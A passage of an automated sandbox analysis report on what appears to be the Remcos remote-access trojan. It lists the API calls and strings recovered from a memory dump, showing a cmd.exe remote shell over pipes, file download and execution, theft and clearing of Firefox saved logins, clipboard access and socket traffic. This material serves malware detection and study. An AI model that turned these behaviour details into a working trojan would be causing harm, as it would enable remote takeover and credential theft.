                                                                                                                                  • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                                                                                  APIs
                                                                                                                                  • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                                                                                  • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3750050125-0
                                                                                                                                  • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                  • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                                                                                                  • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                  • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                                                                                                                  APIs
                                                                                                                                  • GetForegroundWindow.USER32 ref: 0041BB49
                                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ForegroundText
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 29597999-0
                                                                                                                                  • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                                                  • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                                                                                                  • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                                                  • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                                                                                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 806969131-0
                                                                                                                                  • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                                                                  • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                                                                                                                                  • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                                                                  • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                                                                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 806969131-0
                                                                                                                                  • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                  • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                                                                                                  • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                  • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                                                    • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                                                    • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                                                    • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                                                    • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                                                    • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                                                    • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                                                    • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                                                    • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                                                    • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                                                  • CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                                  • CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2948481953-0
                                                                                                                                  • Opcode ID: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                                                                                  • Instruction ID: c73268819cb60d4ae5e82c4b87b0b0ed6d20300d6cd2269ac6e8254bb02e1260
                                                                                                                                  • Opcode Fuzzy Hash: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                                                                                  • Instruction Fuzzy Hash: 4FD05E76C4120CFFCB006BA4AC0E8AEB77CFB09211B50116AEC2442252AA369D188A64
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                                                                  • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                                                                                                                                  • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                                                                  • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __alldvrm
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 65215352-0
                                                                                                                                  • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                                                                  • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                                                                                                                                  • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                                                                  • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                                                                                                                                  APIs
• RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
• Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
• Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
• Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
APIs
• WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Startup
• String ID:
• API String ID: 724789610-0
• Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
• Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
• Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
• Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
APIs
• GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: FromGdipImageLoadStream
• String ID:
• API String ID: 3292405956-0
• Opcode ID: 622fa0b139d9c8e49d1b860aa3f0d2c71aabae9c10a97b9ae04fddd858742a73
• Instruction ID: 43760c1b0819a338a5deeaaf53a1808d78fb0d0861515ad37458d280f23f523c
• Opcode Fuzzy Hash: 622fa0b139d9c8e49d1b860aa3f0d2c71aabae9c10a97b9ae04fddd858742a73
• Instruction Fuzzy Hash: B0D0C9B6514310AFC3619F04DC40AA2B7E8EB15312F11C82BA8D5C2620D7749C488B54
APIs
• GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: GdipImageSaveStream
• String ID:
• API String ID: 971487142-0
• Opcode ID: 2b14b1dce46a2bfe4ee8223d47c11625fbcfce4f614b1a3c8f6551cdff2dc83b
• Instruction ID: 4096a07c3c24ce64e1baa665156051a68d3341f73ff607d033811f23ed9a4a9b
• Opcode Fuzzy Hash: 2b14b1dce46a2bfe4ee8223d47c11625fbcfce4f614b1a3c8f6551cdff2dc83b
• Instruction Fuzzy Hash: 12C0C932008351AB8B529F449C05C5FBAA6BB98211B044C1EF15541120CB258C659B5A
APIs
• CreateThread.KERNEL32(00000000,00000000,Function_00004C01,004758E8,00000000,00000000), ref: 00404BF8
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 93ba778880e199ddb191fa863179a72969e2b1c83519dbb18fcdc4b7e209d100
• Instruction ID: 9d5c7c84f515cf35c3e932a45e486dbb5327be38257a8aa591cdad7e466f248e
• Opcode Fuzzy Hash: 93ba778880e199ddb191fa863179a72969e2b1c83519dbb18fcdc4b7e209d100
• Instruction Fuzzy Hash: 22C04CF1515200BFBA00CB60CD89C37B69DD750701715C8697908D2141D576DC01D538
APIs
• std::_Deallocate.LIBCONCRT ref: 00402E2B
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Deallocatestd::_
• String ID:
• API String ID: 1323251999-0
• Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
• Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
• Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
• Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
APIs
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: recv
• String ID:
• API String ID: 1507349165-0
• Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
• Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
• Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
• Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
APIs
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: send
• String ID:
• API String ID: 2809346765-0
• Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
• Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
• Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
• Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
APIs
• GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: DisposeGdipImage
• String ID:
• API String ID: 1024088383-0
• Opcode ID: 0ec9bc49c4904e7bb4143567628e623777d6e2ea47272714c4fc696535c6f937
• Instruction ID: d9118485f6a3d23189d012adfd41c145ee3959ede018d2d91b25300b670f9ca3
• Opcode Fuzzy Hash: 0ec9bc49c4904e7bb4143567628e623777d6e2ea47272714c4fc696535c6f937
• Instruction Fuzzy Hash: E1A001B4815601DF8F025F609A48A647FA5AB4630A3248199D4898A222D77BC857DE6A
APIs
• VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
• Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
• Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
• Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
APIs
• SetEvent.KERNEL32(?,?), ref: 00407CF4
• GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
• DeleteFileW.KERNEL32(00000000), ref: 00407DE4
  • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
  • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
  • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
• GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
• SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
• DeleteFileA.KERNEL32(?), ref: 0040868D
  • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
  • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
  • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
  • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
• Sleep.KERNEL32(000007D0), ref: 00408733
• StrToIntA.SHLWAPI(00000000), ref: 00408775
                                                                                                                                    • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                                                  • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
APIs
• __Init_thread_footer.LIBCMT ref: 004056E6
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• __Init_thread_footer.LIBCMT ref: 00405723
• CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
• CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
• Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
• PeekNamedPipe.KERNEL32 ref: 004058BC
• ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
• WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
• Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
• TerminateProcess.KERNEL32(00000000), ref: 00405A17
• CloseHandle.KERNEL32 ref: 00405A23
• CloseHandle.KERNEL32 ref: 00405A2B
• CloseHandle.KERNEL32 ref: 00405A3D
• CloseHandle.KERNEL32 ref: 00405A45
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
• String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
APIs
• GetCurrentProcessId.KERNEL32 ref: 00412141
  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
  • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
• OpenMutexA.KERNEL32 ref: 00412181
• CloseHandle.KERNEL32(00000000), ref: 00412190
• CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
• OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
• String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
• FindClose.KERNEL32(00000000), ref: 0040BC04
• FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
• FindClose.KERNEL32(00000000), ref: 0040BD4D
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
APIs
• OpenClipboard.USER32 ref: 004168FD
• EmptyClipboard.USER32 ref: 0041690B
• GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
• GlobalLock.KERNEL32(00000000), ref: 00416934
• GlobalUnlock.KERNEL32(00000000), ref: 0041696A
• SetClipboardData.USER32(0000000D,00000000), ref: 00416973
• CloseClipboard.USER32 ref: 00416990
• OpenClipboard.USER32 ref: 00416997
• GetClipboardData.USER32 ref: 004169A7
